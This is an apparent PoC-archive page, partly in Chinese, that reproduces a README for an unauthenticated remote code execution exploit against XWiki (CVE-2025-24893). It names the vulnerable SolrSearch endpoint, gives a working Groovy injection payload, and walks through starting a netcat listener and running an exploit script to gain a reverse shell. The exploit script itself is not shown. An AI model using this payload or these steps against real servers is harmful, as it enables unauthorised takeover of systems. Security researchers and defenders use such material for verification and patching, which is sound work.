目标达成 感谢每一位支持者 — 我们达成了 100% 目标!

目标: 1000 元 · 已筹: 1310

100%
请我们喝杯咖啡

CVE-2025-24893 PoC — XWiki Platform 安全漏洞

来源
https://github.com/dollarboysushil/CVE-2025-24893-XWiki-Unauthenticated-RCE-Exploit-POC
关联漏洞
标题:XWiki Platform 安全漏洞 (CVE-2025-24893)
Description:XWiki Platform是XWiki开源的一套用于创建Web协作应用程序的Wiki平台。 XWiki Platform存在安全漏洞,该漏洞源于任何来宾用户都可以通过对SolrSearch的请求,造成远程代码执行。
Description
CVE-2025-24893 is a critical unauthenticated remote code execution vulnerability in XWiki (versions < 15.10.11, 16.4.1, 16.5.0RC1) caused by improper handling of Groovy expressions in the SolrSearch macro.
介绍
# CVE-2025-24893 - XWiki Unauthenticated RCE Exploit POC

> ⚠️ Unauthenticated Remote Code Execution in XWiki  
> 🛠️ PoC implementation by [@dollarboysushil](https://dollarboysushil.com)

## 💡 Overview

**CVE-2025-24893** is a critical RCE vulnerability in [XWiki](https://xwiki.org), caused by unsafe Groovy expression handling inside the `SolrSearch` macro. An attacker can inject Groovy code through a crafted GET request, leading to **remote code execution** (no authentication required).

- **Severity:** Critical (CVSS 9.8)
- **Affected:** Versions < 15.10.11, 16.4.1, 16.5.0RC1

---

## 🛠 Technical Breakdown

The vulnerability resides in the **`SolrSearch` macro** (`Main.SolrSearch`) of XWiki, which handles search input using unsafe Groovy evaluation. The macro fails to sanitize user-supplied input, allowing for **arbitrary code execution**.

### 🔥 Vulnerable Endpoint

```
/xwiki/bin/get/Main/SolrSearch?media=rss&text=
```

An attacker can inject Groovy code into the `text` parameter, which is evaluated server-side due to improper input handling within the macro system.

### 💥 Example Payload

```text
}}}{{async async=false}}{{groovy}}'id'.execute(){{/groovy}}{{/async}}
```

This leads to unauthenticated **Remote Code Execution (RCE)** on vulnerable XWiki instances.

### 🔬 Proof-of-Concept (PoC) Demonstration

#### 🧪 Target Environment

The vulnerable target is an XWiki instance running version `15.10.8`, which is affected by CVE-2025-24893.

![Vulnerable XWiki Interface](images/image.png)

---

#### 📡 Preparing the Listener

Start a Netcat listener on the attacker's machine to capture the reverse shell connection:

```bash
nc -lvnp 1337
```

![Netcat Listener Active on Port 1337](images/image1.png)

---

#### 🚀 Launching the Exploit

Run the exploit script `CVE-2025-24893-dbs.py` to deliver the Groovy-based RCE payload to the vulnerable XWiki endpoint.

![Running Exploit Script](images/image2.png)

---

#### 💻 Successful Remote Shell Access

Upon successful execution, the reverse shell will connect back to the listener, granting the attacker remote access to the server.

![Reverse Shell Acquired](images/image3.png)

---

### 📚 References

- OffSec Blog: [CVE-2025-24893 XWiki Groovy RCE](https://www.offsec.com/blog/cve-2025-24893/)
- NVD Entry: [CVE-2025-24893](https://nvd.nist.gov/vuln/detail/CVE-2025-24893)
文件快照

登录后查看神龙缓存的 POC 文件快照

登录查看
备注
    1. 建议优先通过来源进行访问。
    2. 本地 POC 快照面向订阅用户开放;当原始来源失效或无法访问时,本地镜像作为订阅权益的一部分提供。
    3. 持续抓取、验证、维护这份 POC 档案需要不少投入,因此本地快照已纳入付费订阅。您的订阅是让这份资料能继续走下去的关键,由衷感谢。 查看订阅方案 →